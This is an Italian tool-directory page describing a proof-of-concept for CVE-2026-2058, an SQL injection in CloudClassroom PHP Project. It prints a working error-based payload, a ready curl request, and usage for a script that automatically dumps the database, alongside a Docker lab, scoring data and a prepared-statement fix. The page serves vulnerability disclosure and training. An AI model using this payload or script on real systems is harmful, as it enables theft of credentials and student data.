Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-2058-PoC — Proof-of-concept exploit per CVE-2026-2058, una SQL injection nel progetto PHP CloudClassroom, con enumerazione automatica del database ed estrazione dei dati. | Kitploit
Strumenti/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

Proof-of-concept exploit per CVE-2026-2058, una SQL injection nel progetto PHP CloudClassroom, con enumerazione automatica del database ed estrazione dei dati.

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-2058-PoC – Iniezione SQL nel Progetto PHP CloudClassroom

Panoramica

Una vulnerabilità di iniezione SQL è presente nella funzionalità Post Query del Progetto PHP CloudClassroom (v1.0).

La vulnerabilità consente agli attaccanti di iniettare comandi SQL arbitrari tramite il parametro POST squeryx, portando a enumerazione del database ed estrazione dei dati.

Questo repository contiene un Proof of Concept (PoC) che dimostra come la vulnerabilità possa essere sfruttata per estrarre dati sensibili dal database backend.


Informazioni sulla Vulnerabilità

CampoValore
CVECVE-2026-2058
Tipo di VulnerabilitàIniezione SQL
CWECWE-89
Software InteressatoProgetto PHP CloudClassroom
Versione Interessata1.0
ComponenteFunzionalità Post Query
Vettore di AttaccoRemoto
Autenticazione RichiestaNo
ImpattoDivulgazione del database
GravitàAlta
Riferimento Pattern di AttaccoCAPEC-66

Endpoint Vulnerabile

root@kitploit:~
POST /postquerypublic

Parametro Vulnerabile

root@kitploit:~
squeryx

Causa Principale

Il codice backend concatena direttamente l'input dell'utente in una query SQL senza una corretta sanificazione o query parametrizzate.

Esempio di codice vulnerabile:

root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

Poiché $tempsquery deriva dall'input dell'utente, gli attaccanti possono iniettare SQL arbitrario.


Configurazione del Laboratorio Vulnerabile (Docker)

Per scopi di test e ricerca, è disponibile un ambiente Docker vulnerabile.

Eseguire l'applicazione vulnerabile

root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

Proof of Concept

La vulnerabilità può essere attivata utilizzando una tecnica di iniezione SQL basata su errori sfruttando la funzione updatexml() di MySQL.

Esempio di payload:

root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

Sfruttamento Manuale

Esempio di richiesta curl:

root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

Risposta attesa:

root@kitploit:~
XPATH syntax error: '~cc_db~'

Script di Exploit

Questo repository include uno script bash di exploit che automaticamente:

  • Estrae il nome del database
  • Enumera le tabelle
  • Enumera le colonne
  • Scarica i dati delle tabelle

Utilizzo

root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

Esempio:

root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

Impatto

Un attaccante può:

  • Enumerare la struttura del database
  • Estrarre dati sensibili
  • Recuperare le credenziali dell'amministratore
  • Accedere ai registri degli studenti
  • Compromettere completamente il database backend

Punteggio CVSS

NIST NVD

  • Punteggio Base: 9.8 (CRITICO)
  • Vettore: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • Punteggio Base: 7.3 (ALTO)
  • Vettore: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ Nota: Il punteggio CVSS NVD differisce dal punteggio CNA (VulDB) a causa di diverse valutazioni di impatto.


EPSS (Exploit Prediction Scoring System)

L'Exploit Prediction Scoring System (EPSS) stima la probabilità che una vulnerabilità venga sfruttata in natura.

CVEProbabilità EPSSPercentileData
CVE-2026-20580.000287.62 %2026-03-01

Fonte: Dataset FIRST EPSS


Mitigazione

Gli sviluppatori dovrebbero:

  • Utilizzare prepared statements
  • Implementare validazione dell'input
  • Escapare correttamente l'input dell'utente
  • Applicare permessi del database con privilegi minimi

Esempio di implementazione sicura:

root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

Screenshot

Sfruttamento dell'Iniezione SQL

image

image

Riferimenti

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

Disclaimer

Questo exploit è fornito solo per scopi educativi e di ricerca.

L'autore non è responsabile per l'uso improprio o i danni causati da questo codice.


Autore

bl4dsc4n

Ricercatore di Sicurezza

Scarica lo strumento